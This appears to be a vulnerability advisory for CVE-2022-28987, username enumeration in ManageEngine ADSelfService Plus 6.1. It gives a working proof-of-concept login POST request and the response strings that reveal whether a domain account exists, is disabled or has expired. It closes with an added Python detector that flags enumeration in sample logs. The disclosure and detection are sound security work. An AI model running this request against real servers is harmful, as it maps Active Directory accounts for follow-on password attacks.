CVE-2022-28987: vulnerability-research/adselfservice-userenum.md at main · passtheticket/vulnerability-research
ManageEngine ADSelfService Plus v6.1 allows attackers to perform username enumeration via a crafted POST request to /ServletAPI/accounts/login.
Zoho ManageEngine ADSelfService Plus 6121 Username Enumeration
- Version: 6.1 Build 6121
- Tested against: ADSelfService 6118 - 6121
Domain usernames (sAMAccountName) can be enumerated through the application: whether a domain user is enrolled in ADSelfService Plus, and the state of that account, can be inferred from the application's response.
The vulnerability is exploited by sending the following POST request:
PoC HTTP Request:

```http
POST /ServletAPI/accounts/login HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
DNT: 1
Connection: close
Sec-GPC: 1

loginName=USERNAME
```
Administrator, krbtgt and Guest are default accounts in Active Directory; the krbtgt and Guest accounts are disabled by default. The response differs depending on the state of the submitted account:
- If the user does not exist, the response contains `"eSTATUS":"Permission Denied. Kindly contact your Administrator."`
- If the user exists, the response contains `"LOGIN_STATUS":"PASSWORD","WELCOME_NAME":"{Username}"`
- If the user is disabled (for example Guest or krbtgt), the response contains `"eSTATUS":"Your account has been disabled. Please see your system administrator."`
- If the user is expired, the response contains `"eSTATUS":"Your account has expired. Please see your system administrator."`
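Because each response above acts as an oracle on account state, the defensive signal is a single source submitting many distinct `loginName` values to `/ServletAPI/accounts/login` in a short window. The following detection logic is an added example, not part of the original write-up; the log line format and the sample lines are constructed and hypothetical, and real ADSelfService Plus or reverse-proxy logs will differ.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines (hypothetical format: timestamp, source IP,
# method, path, status, request body). 198.51.100.7 cycles through many
# usernames; 203.0.113.9 retries one username, as a normal user would.
SAMPLE_LOG = """\
2022-04-20T10:00:01Z 198.51.100.7 POST /ServletAPI/accounts/login 200 loginName=alice
2022-04-20T10:00:02Z 198.51.100.7 POST /ServletAPI/accounts/login 200 loginName=bob
2022-04-20T10:00:02Z 198.51.100.7 POST /ServletAPI/accounts/login 200 loginName=carol
2022-04-20T10:00:03Z 198.51.100.7 POST /ServletAPI/accounts/login 200 loginName=dave
2022-04-20T10:00:03Z 198.51.100.7 POST /ServletAPI/accounts/login 200 loginName=erin
2022-04-20T10:00:04Z 198.51.100.7 POST /ServletAPI/accounts/login 200 loginName=frank
2022-04-20T10:05:00Z 203.0.113.9 POST /ServletAPI/accounts/login 200 loginName=alice
2022-04-20T10:05:30Z 203.0.113.9 POST /ServletAPI/accounts/login 200 loginName=alice
2022-04-20T10:06:00Z 203.0.113.9 GET /ServletAPI/accounts/login 200 -
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d+) (?P<body>\S+)$"
)
LOGIN_PATH = "/ServletAPI/accounts/login"


def parse_login_attempts(log_text):
    """Yield (timestamp, source, loginName) for POSTs to the login endpoint."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != LOGIN_PATH:
            continue
        body = m["body"]
        if not body.startswith("loginName="):
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["src"], body[len("loginName="):]


def find_enumeration(log_text, window_seconds=60, distinct_threshold=5):
    """Return {source: set_of_usernames} for sources that submitted more than
    `distinct_threshold` distinct loginName values within any `window_seconds`
    sliding window. Repeated attempts on one username are not flagged."""
    attempts = defaultdict(list)
    for ts, src, user in parse_login_attempts(log_text):
        attempts[src].append((ts, user))
    flagged = {}
    for src, events in attempts.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            names = {u for t, u in events[i:] if (t - start).total_seconds() <= window_seconds}
            if len(names) > distinct_threshold:
                flagged[src] = names
                break
    return flagged
```

Thresholds are deliberately conservative; tune them against your own baseline of legitimate enrollment and password-reset traffic before alerting.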